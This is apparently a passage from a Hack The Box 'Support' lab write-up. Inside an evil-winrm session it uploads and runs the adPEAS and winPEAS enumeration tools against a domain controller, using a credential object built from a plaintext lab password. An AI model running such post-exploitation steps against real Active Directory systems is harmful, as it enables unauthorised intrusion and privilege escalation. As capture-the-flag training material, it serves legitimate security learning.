adPEAS
*evil-winrm* ps c:\Users\support\Documents> upload adPEAS.ps1
info: Uploading /home/kali/archive/htb/labs/support/adPEAS.ps1 to C:\Users\support\Documents\adPEAS.ps1
data: 4159704 bytes of 4159704 bytes copied
info: Upload successful!Delivery complete
*evil-winrm* ps c:\Users\support\Documents> $SecPassword = ConvertTo-SecureString 'Ironside47pleasure40Watchful' -AsPlainText -Force ; $Cred = New-Object System.Management.Automation.PSCredential('SUPPORT\support', $SecPassword)Creating a PSCredential object of the support account for adPEAS
*evil-winrm* ps c:\Users\support\Documents> . .\adPEAS.ps1
*evil-winrm* ps c:\Users\support\Documents> Invoke-adPEAS -Domain 'SUPPORT.HTB' -Server 'dc.support.htb' -Cred $Cred
Executing adPEAS
General
SeMachineAccountPrivilege
winPEAS
*Evil-WinRM* PS C:\Users\support\Documents> upload winPEASany.exe
Info: Uploading /home/kali/archive/htb/labs/support/winPEASany.exe to C:\Users\support\Documents\winPEASany.exe
Data: 2625536 bytes of 2625536 bytes copied
Info: Upload successful!Delivery complete
Executing PEAS
ENV
LAPS
LSA
CredentialGuard
Firewall & AV
PEAS flagged no AV
UAC
KrbRelayUp
NTLM
Privileges
As the current, support account
DNS cached
WSL
